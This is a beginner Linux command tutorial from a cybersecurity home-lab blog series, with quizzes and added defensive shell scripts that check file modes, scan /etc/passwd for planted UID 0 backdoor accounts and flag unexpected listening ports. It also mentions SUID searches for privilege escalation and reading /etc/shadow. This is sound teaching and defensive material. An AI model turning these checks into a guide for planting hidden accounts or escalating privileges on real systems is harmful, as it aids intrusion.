Part 2 of the Drillerbyte Cybersecurity Home Lab Series


If you followed Part 1, you have a Kali Linux virtual machine running on your computer right now. But a VM you do not know how to use is like owning a car and sitting in the passenger seat.

This guide fixes that.

By the time you finish this post, you will be able to navigate a Linux system confidently, manage files and folders, handle user accounts and permissions, understand networking from the terminal, and use Linux the way it is actually used in IT support, SOC analysis, and cybersecurity roles. No fluff. No filler. Just the commands that matter, explained in plain English, with hands-on practice exercises at the end of every section.

This is the guide I wish existed when I was starting out.


Table of Contents

  1. What Is Linux and Why Does It Matter?
  2. The Terminal: Your New Best Friend
  3. Section 1: Getting Help — The man Command
  4. Section 2: Navigation — Moving Around the File System
  5. Section 3: Working With Files and Folders
  6. Section 4: Viewing and Reading File Content
  7. Section 5: File Permissions — Who Can Do What
  8. Section 6: Users and Groups — Why They Exist and How to Manage Them
  9. Section 7: Processes — What Is Running on Your System
  10. Section 8: Networking Commands
  11. Section 9: Package Management — Installing and Removing Software
  12. Section 10: Essential Linux Commands for Cybersecurity Professionals
  13. Quick Reference Cheat Sheet
  14. Video Timestamps

What Is Linux and Why Does It Matter?

Linux is an operating system, just like Windows or macOS. The difference is that Linux is open source, meaning anyone can read the code, modify it, and distribute their own version of it. Those versions are called distributions, or distros. Kali Linux, Ubuntu, CentOS, and Debian are all Linux distros.

Here is why you need to care about Linux:

  • Almost every server on the internet runs Linux. When you are doing penetration testing, threat hunting, or incident response, you are almost always dealing with a Linux-based target or tool.
  • The best cybersecurity tools, including Nmap, Metasploit, Wireshark, and Splunk, are built to run natively on Linux.
  • SOC analysts, cloud engineers, and sysadmins work in Linux environments every single day. Knowing Linux is not optional in these roles.
  • Cloud platforms like AWS, Azure, and GCP rely heavily on Linux-based infrastructure. Any cloud security work requires Linux literacy.

The short version: if you want to work in tech, you need to know Linux. This guide will get you there.

Important: Linux is case-sensitive. The folder Documents and the folder documents are completely different. Type every command exactly as shown or it will not work.


The Terminal: Your New Best Friend

The terminal, also called the command line or shell, is a text-based way to interact with your operating system. Instead of clicking icons, you type commands.

On your Kali Linux VM, open the terminal by clicking the terminal icon in the taskbar, or right-click the desktop and select Open Terminal Here.

When it opens, you will see something like this:

kali@kali:~$

Breaking this down:

  • kali is your username
  • @kali is your machine name (hostname)
  • ~ is your current location (~ always means your home directory)
  • $ means you are a regular user (if it shows #, you are root — the most powerful account on the system)

Everything you type goes after the $. Let us start from the beginning.


Section 1: Getting Help — The man Command

Before learning anything else, you need to know how to look things up when you are stuck. That tool is man, short for manual.

man ls

This opens the full manual page for the ls command. You will see a description of the command, every available option, and examples. Use the arrow keys to scroll. Press q to quit and return to your terminal.

man pwd
man cp
man grep

You can run man on virtually any Linux command. This is how professional Linux users look things up. Not always Google. man first.

For a shorter, faster summary:

ls --help
cp --help

The --help flag prints a condensed list of options directly in the terminal without opening a separate manual page.

For when you do not know which command you need at all:

apropos network

This searches manual pages for every command related to a keyword. Think of it as a keyword search across the entire Linux documentation system.

Quick Tip: If a command output is too long and scrolls past the screen, pipe it into less like this: man ls | less. You can scroll at your own pace and press q to exit.


Section 1 Practice Quiz

Question 1: You want to read the manual for the chmod command. What do you type?

Question 2: You want a quick list of options for the grep command without opening the full manual. What flag do you add?

Question 3: You are trying to find a command related to “password” but you do not know its name. Which command would help you find it?

Answers: 1) man chmod 2) grep --help 3) apropos password


Section 2: Navigation — Moving Around the File System

The Linux file system is a tree of folders and files starting from the very top, which is called the root directory and represented by a single forward slash /.

Here is a simplified version of what that tree looks like:

/
├── home/        (user home directories live here)
├── etc/         (system configuration files)
├── var/         (logs and variable data)
├── tmp/         (temporary files)
├── usr/         (user programs and utilities)
├── bin/         (essential system commands)
└── root/        (home directory for the root user only)

Every file on your system has an absolute path starting from /, for example /home/kali/Documents/notes.txt. There is also a relative path, which is based on where you currently are, for example just Documents/notes.txt if you are already inside /home/kali.

The Core Navigation Commands

pwd — Print Working Directory

Shows you exactly where you are right now.

pwd

Output example:

/home/kali

Never feel lost in the terminal. When in doubt, pwd.

ls — List Directory Contents

Shows what files and folders are in the current location.

ls

With useful options:

ls -l       # Long format: shows permissions, owner, size, date
ls -a       # Shows hidden files (files starting with a dot)
ls -la      # Combines both: long format AND hidden files
ls -lh      # Long format with human-readable file sizes (KB, MB, GB)

Hidden files in Linux are not hidden for security; they are usually configuration files that would otherwise clutter your view. Their names always start with a dot, such as .bashrc or .ssh.

cd — Change Directory

Moves you into a different folder.

cd Documents          # Move into the Documents folder
cd /etc               # Move to the absolute path /etc
cd ..                 # Go up one level (to the parent folder)
cd ../..              # Go up two levels
cd ~                  # Go directly to your home directory
cd -                  # Go back to the previous directory you were in

Practice this sequence right now in your terminal:

pwd                   # See where you are
cd /etc               # Move to /etc
ls                    # See what is in there
cd ..                 # Go back up one level
pwd                   # Confirm you are back at /
cd ~                  # Go home
pwd                   # Confirm: should show /home/kali

tree — Visualise Folder Structure

Shows a folder and everything inside it in a tree diagram. Extremely useful for understanding how files are organised.

tree
tree -L 2             # Limit depth to 2 levels

If tree is not installed, run sudo apt install tree to get it.

Quick Tip: Tab completion is one of the most important habits to build. Start typing a folder name and press the Tab key. Linux will autocomplete it. This saves time and prevents typos. For example, type cd Doc and press Tab and it will complete to cd Documents/.


Section 2 Practice Quiz

Question 1: You are deep inside /var/log/apache2/ and want to go back to your home directory in a single command. What do you type?

Question 2: You want to list all files in your current directory, including hidden ones, in long format. What command do you use?

Question 3: What is the difference between cd .. and cd /?

Question 4: You want to know your current location in the file system. What command do you type?

Answers: 1) cd ~ 2) ls -la 3) cd .. moves you up one level from where you are; cd / takes you all the way to the root of the entire file system 4) pwd


Section 3: Working With Files and Folders

Now you can navigate the file system. The next skill is creating, copying, moving, and deleting files and folders.

Creating Files and Folders

touch — Create an Empty File

touch notes.txt
touch report.txt scan_results.txt    # Create multiple files at once

touch creates an empty file. If the file already exists, it updates the file’s timestamp without changing its content.

mkdir — Make a Directory (Folder)

mkdir projects
mkdir -p projects/lab1/scans         # Create nested folders in one command

The -p flag (parents) is essential when you want to create a folder and its parent folders all at once. Without -p, Linux would return an error if projects or lab1 did not already exist.

Copying and Moving

cp — Copy Files or Folders

cp notes.txt backup.txt              # Copy a file and give the copy a new name
cp notes.txt /home/kali/Documents/   # Copy a file to a different folder
cp -r projects/ projects_backup/     # Copy an entire folder and its contents

The -r flag stands for recursive. You always need it when copying folders, because folders contain other things inside them.

mv — Move or Rename

mv notes.txt Documents/              # Move a file to the Documents folder
mv notes.txt important_notes.txt     # Rename a file (same folder, new name)
mv projects/ /tmp/old_projects/      # Move an entire folder

mv does two things: it moves and it renames. If the destination is a different folder, it moves. If the destination is just a new name in the same folder, it renames.

Deleting Files and Folders

rm — Remove Files

rm notes.txt                         # Delete a file
rm -i notes.txt                      # Ask for confirmation before deleting
rm file1.txt file2.txt file3.txt     # Delete multiple files at once

Warning: Linux does not have a Recycle Bin. When you rm something, it is gone. There is no undo. This is one of the most important things to know as a beginner. Always double-check before you run rm.

rm -r and rm -rf — Remove Folders

rm -r old_projects/                  # Delete a folder and everything in it
rm -rf /tmp/junk/                    # Force delete without any prompts

The f flag stands for force. It skips all confirmation prompts. Use rm -rf with extreme caution. A misplaced space in the wrong directory has wiped entire systems before.

rmdir — Remove an Empty Directory

rmdir empty_folder/

This only works if the folder is completely empty. Safer than rm -r for that reason.

Wildcards: Working With Multiple Files at Once

Wildcards let you match multiple files using patterns.

rm *.txt                             # Delete every file ending in .txt
ls *.log                             # List every file ending in .log
cp report_*.csv /backup/             # Copy every file starting with report_

The * character means “match anything.” *.txt means “any filename that ends in .txt.”


Section 3 Practice Quiz

Question 1: Create a folder called cyberlab inside your home directory. Inside it, create two empty files called targets.txt and notes.txt. Write out the three commands you would use.

Question 2: You want to copy the entire cyberlab folder to /tmp/. What command do you use?

Question 3: What is the difference between rm and rm -r?

Question 4: You accidentally created a file called reprot.txt instead of report.txt. How do you fix this without deleting and recreating the file?

Answers: 1) mkdir cyberlab then touch cyberlab/targets.txt then touch cyberlab/notes.txt 2) cp -r cyberlab/ /tmp/ 3) rm only deletes single files; rm -r deletes folders and everything inside them 4) mv reprot.txt report.txt


Section 4: Viewing and Reading File Content

Creating files is one thing. Reading their contents is another. Linux gives you several tools for this, each suited to different situations.

cat — Print the Entire File

cat notes.txt

cat dumps the entire file content to the terminal. Great for short files. Not ideal for files with hundreds of lines because everything scrolls past at once.

less — Read Long Files Page by Page

less /etc/passwd

less opens the file in a scrollable viewer. Use arrow keys or Page Up/Down to navigate. Press q to exit. This is the correct way to read long log files or configuration files.

head and tail — Read the Beginning or End of a File

head notes.txt              # Show the first 10 lines
head -20 notes.txt          # Show the first 20 lines
tail notes.txt              # Show the last 10 lines
tail -50 /var/log/syslog    # Show the last 50 lines of a log file

tail is especially important for reading logs. System logs are constantly being written to, and the newest entries are always at the bottom.

tail -f — Follow a Live Log File

tail -f /var/log/syslog

The -f flag stands for follow. This command keeps the file open and prints new lines as they are written in real time. This is how you monitor a live system. Press Ctrl+C to stop following.

grep — Search Inside Files

grep "failed" /var/log/auth.log
grep -i "error" application.log      # -i makes the search case-insensitive
grep -r "password" /etc/             # -r searches recursively through all files in a folder
grep -n "root" /etc/passwd           # -n shows the line number of each match

grep is one of the most powerful and frequently used commands in Linux. In a SOC role, you will use it constantly to search through logs for specific events, usernames, IP addresses, or error messages.

wc — Word and Line Count

wc -l /etc/passwd          # Count the number of lines in a file
wc -w notes.txt            # Count words
wc -c report.txt           # Count characters (bytes)

Useful for quickly checking how many entries are in a log or how large a file is.

find — Locate Files Anywhere on the System

find /home -name "*.txt"              # Find all .txt files in /home
find / -name "passwd"                 # Find a file called passwd anywhere
find /tmp -type f -newer /etc/passwd  # Find files in /tmp newer than /etc/passwd
find / -perm /4000 2>/dev/null        # Find SUID files (important for security)

find is a powerful search tool. In cybersecurity, it is commonly used during privilege escalation exercises and forensic investigations to locate specific files or files with unusual permissions.

Quick Tip: The 2>/dev/null part at the end of some find commands hides permission-denied errors from cluttering your output. The 2> redirects error messages (stderr) to /dev/null, which is essentially a black hole that discards everything sent to it.


Section 4 Practice Quiz

Question 1: You want to check the last 30 lines of /var/log/auth.log. What command do you use?

Question 2: You want to monitor a log file live as new events come in. Which command and flag do you use?

Question 3: You want to search the file /etc/passwd for any line containing the word “kali”. What command do you type?

Question 4: What is the difference between cat and less?

Answers: 1) tail -30 /var/log/auth.log 2) tail -f followed by the file path 3) grep "kali" /etc/passwd 4) cat prints everything at once; less opens a scrollable viewer, making it much better for long files


Section 5: File Permissions — Who Can Do What

Permissions are one of the most important concepts in Linux. They control exactly who is allowed to read, write, or run every file and folder on the system. Understanding permissions is essential for both system administration and cybersecurity.

Reading Permission Output

Run ls -l and you will see something like this:

-rwxr-xr-- 1 kali kali 4096 May 21 10:32 script.sh

Let us break that down piece by piece:

- rwx r-x r--
│  │   │   │
│  │   │   └── Other (everyone else): read only
│  │   └────── Group: read and execute
│  └────────── Owner: read, write, and execute
└───────────── File type: - means file, d means directory

The three permission sets always appear in this order: Owner, Group, Other.

Each set uses three characters:

  • r = read (can view the file’s contents)
  • w = write (can modify or delete the file)
  • x = execute (can run the file as a program)
  • - = that permission is not granted

Changing Permissions with chmod

Symbolic method (easier to read):

chmod u+x script.sh          # Give the owner execute permission
chmod g-w file.txt           # Remove write permission from the group
chmod o+r report.txt         # Give others read permission
chmod a+x script.sh          # Give everyone execute permission (a = all)

The letters:

  • u = user (owner)
  • g = group
  • o = other
  • a = all three

Numeric (octal) method (faster once you know it):

Each permission has a numeric value:

  • r = 4
  • w = 2
  • x = 1

You add these numbers together for each group:

chmod 755 script.sh    # Owner: 7 (rwx), Group: 5 (r-x), Other: 5 (r-x)
chmod 644 file.txt     # Owner: 6 (rw-), Group: 4 (r--), Other: 4 (r--)
chmod 600 private.key  # Owner: 6 (rw-), Group: 0 (---), Other: 0 (---)
chmod 777 shared.txt   # Everyone can read, write, and execute

Common permission values you will see frequently:

  • 755 is standard for executable scripts and programs
  • 644 is standard for regular files
  • 600 is for sensitive files like private keys (only the owner can read them)
  • 777 means everyone has full access (use with caution, rarely appropriate)

Changing Ownership with chown

chown alice file.txt               # Change owner to alice
chown alice:developers file.txt    # Change owner to alice and group to developers
chown -R alice /home/alice/        # Recursively change ownership of a folder
sudo chown root:root /etc/hosts    # Give root ownership (requires sudo)

What is sudo?

sudo stands for “superuser do.” It lets a regular user run a single command with root (administrator) privileges without fully switching to the root account.

sudo apt update                    # Run apt update as root
sudo chmod 600 /etc/secret.conf    # Change permissions on a system file

You will be prompted for your password the first time you use sudo in a session. After that, sudo caches your authentication for a few minutes, so it will not ask again until that time runs out.

Security Note: In a real production environment, file permissions matter enormously. Weak permissions on sensitive files like SSH keys, configuration files, or password databases are a common entry point attackers look for during penetration tests. Setting chmod 600 on private keys is not optional. It is standard practice.
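To make the symbolic and octal forms above concrete, here is an added shell example (not from the original post) that converts between the string ls -l prints and the number chmod takes, labels a mode using the guidance above, and reads a real file's mode back from the first column of ls -l. Function names such as perm_to_octal are my own.

```shell
#!/bin/sh
# Added example, not from the original post: translate between the permission
# string that ls -l prints and the octal mode that chmod takes, then read a real
# file's mode back the same way the post does, from the first column of ls -l.

# Score one three-character set (owner, group or other) with the 4/2/1 scheme.
triplet_value() {
    v=0
    case "$1" in r??) v=$((v + 4)) ;; esac
    case "$1" in ?w?) v=$((v + 2)) ;; esac
    case "$1" in ??x) v=$((v + 1)) ;; esac
    echo "$v"
}

# rwxr-xr-- -> 754. Accepts the 9-character string or the full 10-character
# ls -l column, whose first character is the file type (- or d).
perm_to_octal() {
    p=$1
    case "$p" in ??????????) p=${p#?} ;; esac
    printf '%s%s%s\n' \
        "$(triplet_value "$(printf '%s' "$p" | cut -c1-3)")" \
        "$(triplet_value "$(printf '%s' "$p" | cut -c4-6)")" \
        "$(triplet_value "$(printf '%s' "$p" | cut -c7-9)")"
}

# One octal digit -> its three characters, e.g. 6 -> rw-.
digit_to_triplet() {
    r='-'; w='-'; x='-'
    if [ $(($1 & 4)) -ne 0 ]; then r='r'; fi
    if [ $(($1 & 2)) -ne 0 ]; then w='w'; fi
    if [ $(($1 & 1)) -ne 0 ]; then x='x'; fi
    printf '%s%s%s' "$r" "$w" "$x"
}

# 644 -> rw-r--r--. Rejects anything that is not three octal digits.
octal_to_perm() {
    case "$1" in [0-7][0-7][0-7]) ;; *) echo "bad mode: $1" >&2; return 1 ;; esac
    printf '%s%s%s\n' \
        "$(digit_to_triplet "${1%??}")" \
        "$(digit_to_triplet "$(printf '%s' "$1" | cut -c2)")" \
        "$(digit_to_triplet "${1#??}")"
}

# Classify a mode using the post's guidance: 600 for secrets, 777 almost never.
# Only the last digit (Other) decides whether the whole system can touch the file.
mode_risk() {
    other=${1#??}
    if [ $((other & 2)) -ne 0 ]; then
        echo "world-writable: anyone on the system can change this file"
    elif [ "$1" = 600 ] || [ "$1" = 700 ]; then
        echo "owner-only: what a private key should look like"
    elif [ $((other & 4)) -ne 0 ]; then
        echo "world-readable: fine for scripts and ordinary files, not for secrets"
    else
        echo "owner and group only"
    fi
}

# Read a file's mode from the first column of ls -l, as the post reads it.
file_mode() {
    perm_to_octal "$(ls -ld "$1" | cut -c1-10)"
}

# Demo over the strings used in the post.
for s in rwxr-xr-- rw-r--r-- rw------- rwxrwxrwx; do
    m=$(perm_to_octal "$s")
    printf '%s = %s (%s)\n' "$s" "$m" "$(mode_risk "$m")"
done
```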


Section 5 Practice Quiz

Question 1: What does the permission string rwxr-xr-- mean in plain English for each of the three groups?

Question 2: You have a script called run.sh. You want only the owner to be able to read, write, and execute it, and no one else to have any access at all. What chmod command do you use?

Question 3: You want to change the owner of a file called config.txt to a user named bob. What command do you use?

Question 4: What is the numeric value of rw-r--r--?

Answers: 1) Owner can read, write, execute; group can read and execute; others can only read 2) chmod 700 run.sh 3) chown bob config.txt 4) 644


Section 6: Users and Groups — Why They Exist and How to Manage Them

Why User Accounts Matter

Every person or process that interacts with a Linux system does so through a user account. This is not just an administrative convenience. It is a security boundary.

If every user shared the same account, a compromised account would mean full access to everything. By separating users, Linux ensures that each person or process only has access to what they specifically need. This is the principle of least privilege, and it is foundational to cybersecurity.

The Key Account Files

Linux stores user and authentication information in three files. You will encounter all three in your career:

cat /etc/passwd      # Stores basic user account information
cat /etc/shadow      # Stores hashed passwords (requires root to read)
cat /etc/group       # Stores group memberships

The /etc/passwd file format looks like this:

kali:x:1000:1000:Kali,,,:/home/kali:/bin/bash

From left to right, separated by colons:

  1. Username: kali
  2. Password placeholder: x (actual hash is in /etc/shadow)
  3. User ID (UID): 1000
  4. Group ID (GID): 1000
  5. Comment/Full name: Kali,,,
  6. Home directory: /home/kali
  7. Default shell: /bin/bash

Creating a New User

sudo useradd analyst                          # Create a basic user
sudo useradd -m analyst                       # Create a user and their home directory
sudo useradd -m -s /bin/bash -c "SOC Analyst" analyst    # Full creation with shell and comment
sudo passwd analyst                           # Set a password for the user

The -m flag creates the home directory at /home/analyst. Without it, no home folder is created. The -s flag sets the default shell. Always use -m when creating real user accounts.

Modifying a User

sudo usermod -aG sudo analyst                 # Add analyst to the sudo group
sudo usermod -aG developers,security analyst  # Add to multiple groups
sudo usermod -s /bin/bash analyst             # Change the user's shell
sudo usermod -l newname analyst               # Rename the account

The -aG flag means “append to group.” The a is critical. Without it, running usermod -G sudo analyst would replace all of the user's existing supplementary group memberships with just sudo, removing the user from every other group they belonged to.

Deleting a User

sudo userdel analyst                          # Remove the account (keeps home folder)
sudo userdel -r analyst                       # Remove account AND home directory

In a real environment, you typically do not delete accounts immediately. You disable them first, retain the home directory for forensics if needed, then delete after a set period. But in a lab, userdel -r is fine.

Working With Groups

sudo groupadd security                        # Create a new group
sudo groupadd -g 1500 security               # Create a group with a specific group ID
sudo groupdel security                        # Delete a group
groups analyst                               # Show all groups a user belongs to
id analyst                                   # Show UID, GID, and all group memberships

Switching Users

su analyst                    # Switch to another user (requires their password)
su -                          # Switch to root (requires root password)
sudo su                       # Switch to root using your own sudo password
whoami                        # Confirm which user you currently are
id                            # Show your current UID, GID, and groups

SOC Relevance: Suspicious user creation is a major red flag in security monitoring. When an attacker gains access to a system, one of the first things they do is create a backdoor account. Knowing how to list users with cat /etc/passwd, search for recently created accounts, and cross-reference group memberships is a core skill for incident response.
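As an added example that is not part of the original post, the shell functions below run the /etc/passwd checks described above over a constructed sample file: accounts with UID 0, accounts that can actually log in, duplicated UIDs, and home directories in odd places. The sample entries (including the planted support account) and the function names are assumptions for this demonstration; each function defaults to the real /etc/passwd when called without a file argument.

```shell
#!/bin/sh
# Added example, not from the original post: the checks an analyst runs over
# /etc/passwd when hunting for a backdoor account. SAMPLE_PASSWD is constructed
# for this demo; point the functions at /etc/passwd (the default) on a real host.

SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
kali:x:1000:1000:Kali,,,:/home/kali:/bin/bash
analyst:x:1001:1001:SOC Analyst:/home/analyst:/bin/bash
support:x:0:0:helpdesk:/tmp:/bin/bash
EOF

# Field n of the 7-field passwd line for one user (1=name, 3=UID, 6=home, 7=shell).
passwd_field() {
    awk -F: -v u="$1" -v n="$2" '$1 == u { print $n }' "${3:-/etc/passwd}"
}

# Every account whose UID is 0 is root, whatever it is called.
# There should be exactly one: root.
uid_zero_accounts() {
    awk -F: '$3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# Accounts that can actually log in: the shell is neither nologin nor false.
interactive_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"
}

# Two usernames sharing a UID are the same identity to the kernel; a second
# UID 0 entry is the classic planted backdoor.
duplicate_uids() {
    awk -F: '{ seen[$3]++ } END { for (u in seen) if (seen[u] > 1) print u }' "${1:-/etc/passwd}"
}

# Interactive accounts whose home is neither /root nor under /home.
# useradd -m never creates that layout, so it is worth a second look.
odd_home_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ && $6 != "/root" && substr($6, 1, 6) != "/home/" { print $1 }' \
        "${1:-/etc/passwd}"
}

# Demo against the constructed sample.
printf 'UID 0 accounts:   %s\n' "$(uid_zero_accounts "$SAMPLE_PASSWD" | tr '\n' ' ')"
printf 'Interactive:      %s\n' "$(interactive_accounts "$SAMPLE_PASSWD" | tr '\n' ' ')"
printf 'Duplicate UIDs:   %s\n' "$(duplicate_uids "$SAMPLE_PASSWD" | tr '\n' ' ')"
printf 'Odd home dirs:    %s\n' "$(odd_home_accounts "$SAMPLE_PASSWD" | tr '\n' ' ')"
printf 'Home of kali:     %s\n' "$(passwd_field kali 6 "$SAMPLE_PASSWD")"
```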


Section 6 Practice Quiz

Question 1: Create a user called trainee with a home directory and the bash shell. Write the full command.

Question 2: After creating trainee, you want to add them to the sudo group. What command do you use, and why is the -a flag important?

Question 3: Which file contains hashed passwords, and what permission level do you need to read it?

Question 4: You run whoami and it returns trainee. How do you switch to the kali user?

Answers: 1) sudo useradd -m -s /bin/bash trainee then sudo passwd trainee 2) sudo usermod -aG sudo trainee. The -a flag appends the group rather than replacing all existing groups 3) /etc/shadow, requires root access 4) su kali and enter kali’s password, or su - kali


Section 7: Processes — What Is Running on Your System

Every program running on your Linux system is a process. Each process has a unique PID (Process ID). Knowing how to view and manage processes is critical for both sysadmins and security analysts.

ps — Snapshot of Current Processes

ps                          # Show processes in your current terminal session
ps aux                      # Show ALL running processes for ALL users
ps aux | grep apache        # Find a specific process by name

The output of ps aux includes:

  • USER: who is running the process
  • PID: the process ID
  • %CPU and %MEM: resource usage
  • COMMAND: what program is running

top — Live Process Monitor

top

top gives you a real-time, updating view of all running processes sorted by CPU usage. Press q to exit, k to kill a process by PID, M to sort by memory usage.

htop — A Better Version of top

htop

htop is a more user-friendly, colour-coded version of top. If it is not installed: sudo apt install htop. Use arrow keys to select a process, press F9 to send it a signal, or press F10 to quit.

kill — Stop a Process

kill 1234                   # Send a termination signal to process 1234
kill -9 1234                # Force kill: immediately terminate, no cleanup
killall firefox             # Kill every process named firefox

The -9 flag sends SIGKILL, which cannot be ignored by the process. Use it when a normal kill does not work.

jobs, bg, fg — Foreground and Background

ping google.com &           # The & runs a command in the background
jobs                        # List all background jobs
fg 1                        # Bring job 1 to the foreground
bg 1                        # Resume a paused job in the background

Press Ctrl+Z to pause (suspend) a running process. Then use bg to resume it in the background or fg to bring it back to the foreground.

Security Relevance: During an incident response investigation, reviewing running processes is one of the first things an analyst does. Unusual process names, processes running as root that should not be, or processes communicating on unexpected ports are all indicators of compromise. ps aux combined with grep and netstat is a fundamental part of the triage workflow.


Section 7 Practice Quiz

Question 1: You want to see all running processes on the system, from all users, with CPU and memory usage. What command do you use?

Question 2: A process with PID 4521 is hanging and not responding to a normal kill signal. How do you force-terminate it?

Question 3: You start a long-running command and want it to keep running while you do other things in the same terminal. What character do you add at the end of the command?

Answers: 1) ps aux 2) kill -9 4521 3) The & character, for example nmap 192.168.1.0/24 &


Section 8: Networking Commands

Linux has a full toolkit for network configuration, testing, and analysis. These commands are used daily in sysadmin, networking, and cybersecurity roles.

ip a — Show Network Interfaces and IP Addresses

ip a
ip a show eth0              # Show details for a specific interface

This is the modern replacement for the older ifconfig command. Run ip a on your Kali VM right now and look for the eth0 interface. That is your main network adapter and where your IP address will be listed.

ip r — Show the Routing Table

ip r

Shows how your system routes traffic. Useful for confirming that your network adapters are configured correctly, which was covered in Part 1 of this series.

ping — Test Connectivity

ping google.com                     # Send packets to google.com continuously
ping -c 4 google.com                # Send exactly 4 packets then stop
ping 192.168.1.1                    # Ping a local IP address

ping sends ICMP echo request packets to a destination. If you get replies, the destination is reachable. If you get “Destination Host Unreachable” or no response, there is a connectivity problem.

netstat and ss — Active Connections and Listening Ports

ss -tuln                    # Show all listening TCP and UDP ports
ss -tulnp                   # Same but also show the process using each port
netstat -tuln               # Older equivalent (may need net-tools: sudo apt install net-tools)

In a security context, checking listening ports is how you discover which services are running and whether any unexpected ports are open. This is a fundamental step in both hardening a system and investigating a compromise.
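The following is an added example, not from the original post: it parses ss -tuln output (a constructed sample here) into listening sockets, reports any proto/port that is not on an allowlist you pass in, and lists the sockets bound to every interface rather than loopback only. The function names and the sample ports are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Parses the output of ss -tuln and
# compares the listening ports against an allowlist, which is the "any
# unexpected ports open?" check described above. SAMPLE_SS is constructed for
# the demo; on a real host run: ss -tuln | unexpected_ports "tcp/22 tcp/80 udp/68"

SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      511    127.0.0.1:80      0.0.0.0:*
tcp   LISTEN 0      128    [::]:22           [::]:*
udp   UNCONN 0      0      0.0.0.0:68        0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:5555      0.0.0.0:*'

# stdin: ss -tuln output. stdout: "proto port bind-address", one per socket.
# Column 5 is Local Address:Port; the port is whatever follows the last colon,
# which also copes with IPv6 forms such as [::]:22.
listening_sockets() {
    awk 'NR > 1 && ($2 == "LISTEN" || $2 == "UNCONN") {
            n = split($5, a, ":")
            port = a[n]
            addr = substr($5, 1, length($5) - length(port) - 1)
            print $1, port, addr
         }' | sort -u
}

# stdin: ss -tuln output. $1: allowlist such as "tcp/22 tcp/80 udp/68".
# stdout: every listening proto/port that is not on the list.
unexpected_ports() {
    listening_sockets | awk -v allow=" $1 " '{
        key = $1 "/" $2
        if (index(allow, " " key " ") == 0) print key
    }' | sort -u
}

# stdin: ss -tuln output. stdout: proto/port of sockets bound to all interfaces
# (0.0.0.0, [::] or *), i.e. reachable from the network, not just localhost.
network_exposed() {
    listening_sockets | awk '$3 == "0.0.0.0" || $3 == "[::]" || $3 == "*" { print $1 "/" $2 }' | sort -u
}

# Demo against the constructed sample.
echo "Listening sockets:"
printf '%s\n' "$SAMPLE_SS" | listening_sockets
echo "Not on the allowlist:"
printf '%s\n' "$SAMPLE_SS" | unexpected_ports "tcp/22 tcp/80 udp/68"
echo "Reachable from the network:"
printf '%s\n' "$SAMPLE_SS" | network_exposed
```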

nslookup and dig — DNS Lookups

nslookup google.com                     # Simple DNS lookup
dig google.com                          # Detailed DNS lookup
dig google.com MX                       # Look up mail server records
dig @8.8.8.8 drillerbyte.com            # Query a specific DNS server

DNS translates domain names to IP addresses. These tools are essential in threat intelligence and phishing investigations when you need to trace where a domain resolves to, who owns it, or which mail servers it uses.

traceroute — Trace the Network Path

traceroute google.com

Shows every hop between your machine and a destination. Useful for diagnosing where in the network a connection is failing.

curl and wget — Download and Test HTTP

curl https://example.com                    # Fetch a web page and print it to terminal
curl -I https://example.com                 # Fetch only the HTTP headers
wget https://example.com/file.zip          # Download a file
wget -q https://example.com/file.zip       # Download quietly (no progress output)

curl and wget are used constantly for downloading tools, testing web applications, and interacting with APIs from the terminal.

hostname — Show or Set the Machine Name

hostname                    # Show the current hostname
hostname -I                 # Show all IP addresses assigned to this machine

Networking Quick Win: On your Kali VM, run ip a right now and note down your IP address. Then open a terminal on your Windows host and run ping [kali-ip]. If you get replies, your bridged adapter from Part 1 is working correctly. This is a basic but important connectivity verification.


Section 8 Practice Quiz

Question 1: What command shows you all listening ports and the processes using them?

Question 2: You want to test whether your Kali VM can reach Google’s DNS server at 8.8.8.8. What command do you use, and how do you limit it to exactly 4 packets?

Question 3: What is the difference between curl and wget?

Question 4: You want to look up the IP address for drillerbyte.com. Which two commands could you use?

Answers: 1) ss -tulnp 2) ping -c 4 8.8.8.8 3) curl outputs content to the terminal and is used for testing and API interaction; wget is used for downloading files 4) nslookup drillerbyte.com or dig drillerbyte.com


Section 9: Package Management — Installing and Removing Software

On Linux, software is installed via package managers rather than downloading .exe files. Kali Linux and Ubuntu both use APT (Advanced Package Tool).

apt update — Refresh the Package List

sudo apt update

This does not install or upgrade anything. It just fetches the latest list of available packages from the repositories. Always run this before installing anything.

apt upgrade — Apply Available Updates

sudo apt upgrade
sudo apt full-upgrade              # Includes kernel and dependency updates

apt install — Install a Package

sudo apt install nmap
sudo apt install htop tree net-tools    # Install multiple packages at once
sudo apt install -y nmap               # The -y flag auto-confirms without prompting

apt remove and apt purge — Uninstall Software

sudo apt remove nmap               # Remove the program but keep config files
sudo apt purge nmap                # Remove the program AND its configuration files
sudo apt autoremove                # Remove packages that are no longer needed

apt search — Find a Package

apt search wireshark
apt show nmap                      # Show detailed info about a specific package

dpkg — Low-Level Package Tool

dpkg -l                            # List all installed packages
dpkg -l | grep nmap                # Check if a specific package is installed
sudo dpkg -i package.deb           # Install a downloaded .deb file manually

Quick Tip: If you ever download a tool directly as a .deb file rather than from the package manager (which sometimes happens with third-party security tools), use sudo dpkg -i filename.deb to install it.


Section 9 Practice Quiz

Question 1: What is the correct order of commands before installing a new package? Why does the order matter?

Question 2: You want to install wireshark and automatically say yes to all prompts. What command do you use?

Question 3: What is the difference between apt remove and apt purge?

Answers: 1) sudo apt update first, then sudo apt install. The update refreshes the available package list so you install the latest version, not a cached old one 2) sudo apt install -y wireshark 3) apt remove keeps configuration files; apt purge removes everything including configs. Use purge for a clean uninstall


Section 10: Essential Linux Commands for Cybersecurity Professionals {#cybersecurity-commands}

This section covers the commands that come up constantly in real security work. If you are aiming for a SOC analyst, penetration tester, or IT security role, these are your bread and butter.

Log Analysis

System logs are your primary evidence source during an incident. On Linux, the key log files are listed below. Note that on a system that writes only to the systemd journal (no rsyslog installed), some of these files will not exist; journalctl gives you the same events there.

/var/log/syslog          # General system messages
/var/log/auth.log        # Authentication events: logins, sudo, SSH
